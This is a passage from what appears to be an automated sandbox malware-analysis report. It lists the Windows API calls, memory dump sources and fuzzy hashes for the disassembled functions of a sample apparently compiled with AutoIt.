                                                          • GetWindowRect.USER32(?,?), ref: 003417FE
                                                          • ScreenToClient.USER32(?,?), ref: 0034181B
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0034182C
                                                          • EndPaint.USER32(?,?), ref: 00341876
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                          • String ID:
                                                          • API String ID: 1827037458-0
                                                          • Opcode ID: faba01600d182608093e2f841b4b778eb420dc631711fad85c91d0f487545d65
                                                          • Instruction ID: 5764b5fd2088ab0ab020c97b5bb2cc692f6afd6cf2a3fcb3858a86d09c3150d1
                                                          • Opcode Fuzzy Hash: faba01600d182608093e2f841b4b778eb420dc631711fad85c91d0f487545d65
                                                          • Instruction Fuzzy Hash: 2E41A0311006049FD712DF25CC84FB77BF8EB46724F044629FAA4DB1A2C730A885DB61
                                                          APIs
                                                          • ShowWindow.USER32(004057B0,00000000,01745310,?,?,004057B0,?,003CB5DC,?,?), ref: 003CB746
                                                          • EnableWindow.USER32(00000000,00000000), ref: 003CB76A
                                                          • ShowWindow.USER32(004057B0,00000000,01745310,?,?,004057B0,?,003CB5DC,?,?), ref: 003CB7CA
                                                          • ShowWindow.USER32(00000000,00000004,?,003CB5DC,?,?), ref: 003CB7DC
                                                          • EnableWindow.USER32(00000000,00000001), ref: 003CB800
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 003CB823
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 506ce6000701c89baed31d73fc50a075f4a7c9191ae55d615e526f7d2c25c8aa
                                                          • Instruction ID: 96362a66d208bfbb48f2eaf78bd883b655ed3932dcbcb18f81733fc7c67b5b54
                                                          • Opcode Fuzzy Hash: 506ce6000701c89baed31d73fc50a075f4a7c9191ae55d615e526f7d2c25c8aa
                                                          • Instruction Fuzzy Hash: 98413934600244EFDB23CF24D48AF94BBE5BF45315F1981A9E949DF2A2C732AC55CB91
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,003B4F57,?,?,00000000,00000001), ref: 003B71C1
                                                            • Part of subcall function 003B3AB6: GetWindowRect.USER32(?,?), ref: 003B3AC9
                                                          • GetDesktopWindow.USER32 ref: 003B71EB
                                                          • GetWindowRect.USER32(00000000), ref: 003B71F2
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003B7224
                                                            • Part of subcall function 003A52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5363
                                                          • GetCursorPos.USER32(?), ref: 003B7250
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003B72AE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: a3900f1c772a0c8521e9deea4f4f9c5dcbc99e65bbdaa17688fd359781f4b804
                                                          • Instruction ID: 221c2485648ae0795b5cd8a103cee975e17294ed3c38148ea0de8dd84a5437b7
                                                          • Opcode Fuzzy Hash: a3900f1c772a0c8521e9deea4f4f9c5dcbc99e65bbdaa17688fd359781f4b804
                                                          • Instruction Fuzzy Hash: 12318172509305AFD721DF54C849F9ABBAAFFC9314F000919F685AB191DB30EA198B92
                                                          APIs
                                                            • Part of subcall function 003983D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003983E8
                                                            • Part of subcall function 003983D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003983F2
                                                            • Part of subcall function 003983D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00398401
                                                            • Part of subcall function 003983D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00398408
                                                            • Part of subcall function 003983D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0039841E
                                                          • GetLengthSid.ADVAPI32(?,00000000,00398757), ref: 00398B8C
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00398B98
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00398B9F
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00398BB8
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00398757), ref: 00398BCC
                                                          • HeapFree.KERNEL32(00000000), ref: 00398BD3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          • Opcode ID: a6dc1303be36082748aa5e11fc0d1bacca56625d0d436669536502bfae0bed76
                                                          • Instruction ID: 6f5635335a329d533933b64a3e496ca63c02ecb3286c157b970f835416f130df
                                                          • Opcode Fuzzy Hash: a6dc1303be36082748aa5e11fc0d1bacca56625d0d436669536502bfae0bed76
                                                          • Instruction Fuzzy Hash: 5111BEB2500604FFDF129FA8CC09FAE7BADEB86315F184029E845D7250CB32AA00CB60
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0039890A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00398911
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00398920
                                                          • CloseHandle.KERNEL32(00000004), ref: 0039892B
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0039895A
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 0039896E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: 8c65dc00ae0299228ef5932744ddb8226abd31d04205fbe29215d186ee8f083e
                                                          • Instruction ID: fdbc99ea42201f46dcdf7e7853e3875942352e7489d6ff6d3f864a24e1169619
                                                          • Opcode Fuzzy Hash: 8c65dc00ae0299228ef5932744ddb8226abd31d04205fbe29215d186ee8f083e
                                                          • Instruction Fuzzy Hash: F1116776500209AFDF028FA4DC48EEE7BADFB49344F044069FA04E2160C7729D20AB61
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 0039BA77
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0039BA88
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0039BA8F
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0039BA97
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0039BAAE
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0039BAC0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 4bd69b129ea2b368b9699c00ee7320426be47bd8b84b68608f68d53688da4a46
                                                          • Instruction ID: 293d541b69f663308e29afc9d35c4413bceb580f4f35dd9a14dc9adce01a67bd
                                                          • Opcode Fuzzy Hash: 4bd69b129ea2b368b9699c00ee7320426be47bd8b84b68608f68d53688da4a46
                                                          • Instruction Fuzzy Hash: F70121B5A00218BBEF119BA69D45E5EBFA9EB48751F004065FA04E7291D670A910CF90
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00360313
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0036031B
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00360326
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00360331
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00360339
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00360341
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: 36b21cb38d18cfcdb9ba8da48c04f66594a0e8074fa55569bd02ce2e8fdf2828
                                                          • Instruction ID: 6d8291223c248a1e40a0e8ccb5bc3aebd7abba42d72e2ef283b63d481a51eb77
                                                          • Opcode Fuzzy Hash: 36b21cb38d18cfcdb9ba8da48c04f66594a0e8074fa55569bd02ce2e8fdf2828
                                                          • Instruction Fuzzy Hash: E3016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87941C7F5A864CBE5
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003A54A0
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003A54B6
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 003A54C5
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A54D4
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A54DE
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A54E5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: 9d149093bf145d8b7bba84d53f60a666f140736e3c78ec1369470fc798dd56f1
                                                          • Instruction ID: b2b79f682c1d8a99b4a249ea6a89d815005e6fa6c8396832221c4ca03e3962d6
                                                          • Opcode Fuzzy Hash: 9d149093bf145d8b7bba84d53f60a666f140736e3c78ec1369470fc798dd56f1
                                                          • Instruction Fuzzy Hash: A8F03032241558BFE7225BA2DC0EEEF7B7DEFCAB11F040169FA04D1090D7A12A1187B5
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 003A72EC
                                                          • EnterCriticalSection.KERNEL32(?,?,00351044,?,?), ref: 003A72FD
                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00351044,?,?), ref: 003A730A
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00351044,?,?), ref: 003A7317
                                                            • Part of subcall function 003A6CDE: CloseHandle.KERNEL32(00000000,?,003A7324,?,00351044,?,?), ref: 003A6CE8
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 003A732A
                                                          • LeaveCriticalSection.KERNEL32(?,?,00351044,?,?), ref: 003A7331
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: 11b71ad913164b06b22495bab7836c5dfe75dcf7182f101acb3e2503e37234bf
                                                          • Instruction ID: 677938a316df98797562ca9e8e1dc38f8f89e403b50bb3aa0bad912cfba12f53
                                                          • Opcode Fuzzy Hash: 11b71ad913164b06b22495bab7836c5dfe75dcf7182f101acb3e2503e37234bf
                                                          • Instruction Fuzzy Hash: F7F03A3E140612EFEB131B64ED88DDA773EEF49312F050932F502D50A0CB756811CBA0
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00398C5F
                                                          • UnloadUserProfile.USERENV(?,?), ref: 00398C6B
                                                          • CloseHandle.KERNEL32(?), ref: 00398C74
                                                          • CloseHandle.KERNEL32(?), ref: 00398C7C
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00398C85
                                                          • HeapFree.KERNEL32(00000000), ref: 00398C8C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: 3bf8de92c5b4ece72babe45ba2712b70bba24c8275e1a0b29f6fdfed18b5e38f
                                                          • Instruction ID: 2b54b5f2ea5485ab74f8bfab3cac73a19d546e8d02d729d5aecd0aec00f3796d
                                                          • Opcode Fuzzy Hash: 3bf8de92c5b4ece72babe45ba2712b70bba24c8275e1a0b29f6fdfed18b5e38f
                                                          • Instruction Fuzzy Hash: D5E05276104505FFDA022FE6EC0CD5ABB6EFB89762B548632F219C1470CB32A461DB50
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 00397A12
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 00397A2A
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,003CFB80,000000FF,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 00397A4F
                                                          • _memcmp.LIBCMT ref: 00397A70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID: ,,=
                                                          • API String ID: 314563124-2941206825
                                                          • Opcode ID: 06fbb13327cc71d623923a11d79ad438eea833b739fe6a3228f5a53b59627e3f
                                                          • Instruction ID: 7917d984a75d0cc5fb80f0dc36e50ce515aaea1e07c6af6575b08c12d443b981
                                                          • Opcode Fuzzy Hash: 06fbb13327cc71d623923a11d79ad438eea833b739fe6a3228f5a53b59627e3f
                                                          • Instruction Fuzzy Hash: AB811971A10109EFCF05DF94C988EEEB7B9FF89315F204199E516AB290DB71AE05CB60
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 003B8728
                                                          • CharUpperBuffW.USER32(?,?), ref: 003B8837
                                                          • VariantClear.OLEAUT32(?), ref: 003B89AF
                                                            • Part of subcall function 003A760B: VariantInit.OLEAUT32(00000000), ref: 003A764B
                                                            • Part of subcall function 003A760B: VariantCopy.OLEAUT32(00000000,?), ref: 003A7654
                                                            • Part of subcall function 003A760B: VariantClear.OLEAUT32(00000000), ref: 003A7660
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4237274167-1221869570
                                                          • Opcode ID: 7f9360bc9461d3979d7257cb6d03c11a39b4e64f91985f89582fd5b6589f3e47
                                                          • Instruction ID: b8f4244b2445d75d0ebc34ef9210351242ce624dbde7e3c09de4192447de24d4
                                                          • Opcode Fuzzy Hash: 7f9360bc9461d3979d7257cb6d03c11a39b4e64f91985f89582fd5b6589f3e47
                                                          • Instruction Fuzzy Hash: 289190756043019FCB05DF24C4819ABBBE8EF89318F14896EF996CB761DB31E905CB52
                                                          APIs
                                                            • Part of subcall function 0035FE06: _wcscpy.LIBCMT ref: 0035FE29
                                                          • _memset.LIBCMT ref: 003A2E7F
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003A2EAE
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003A2F61
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003A2F8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          • Opcode ID: 6be89883156e7ce7d9da61e5b20aee32bd73b3bb8848bb0b5a9684d1132c3541
                                                          • Instruction ID: a19b5b82586f5788fd34215a30460bb2be22f280443192111a845039cfd2b15b
                                                          • Opcode Fuzzy Hash: 6be89883156e7ce7d9da61e5b20aee32bd73b3bb8848bb0b5a9684d1132c3541
                                                          • Instruction Fuzzy Hash: E851C0316083019ED7269F2CC845A6BB7F8EF86310F054A2EF894EA191DB70DD448B92
                                                          APIs
                                                          • _memset.LIBCMT ref: 003A2AB8
                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003A2AD4
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 003A2B1A
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00405890,00000000), ref: 003A2B63
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          • Opcode ID: f160113c850f5928b07de30967e08ad1dd7551c73170c52fc3ce47035c8b11f6
                                                          • Instruction ID: cc5d6ba8af2ad0c1beb4d8f0929d7e3f5fca701d7ec6b8c63b83ce9ab64fa048
                                                          • Opcode Fuzzy Hash: f160113c850f5928b07de30967e08ad1dd7551c73170c52fc3ce47035c8b11f6
                                                          • Instruction Fuzzy Hash: 2E41A4712043029FD726DF28C885F2BB7E9EF86320F15465DF9669B291D770E904CB62
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003BD8D9
                                                            • Part of subcall function 003479AB: _memmove.LIBCMT ref: 003479F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower_memmove
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 3425801089-567219261
                                                          • Opcode ID: 6f07fee272efffa0b6c692ea11f9ee976a2e4fd29a9aad69e8021ed592bbbdf4
                                                          • Instruction ID: ddded56359db4d4384e5ee45057ef2e1cafbf28bde2a73f30286bedce0752b05
                                                          • Opcode Fuzzy Hash: 6f07fee272efffa0b6c692ea11f9ee976a2e4fd29a9aad69e8021ed592bbbdf4
                                                          • Instruction Fuzzy Hash: 7531C070904619AFCF16EF54CC919FEB3B4FF05314B10862AE9659FAD1DB31A905CB80
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003991D6
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003991E9
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00399219
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
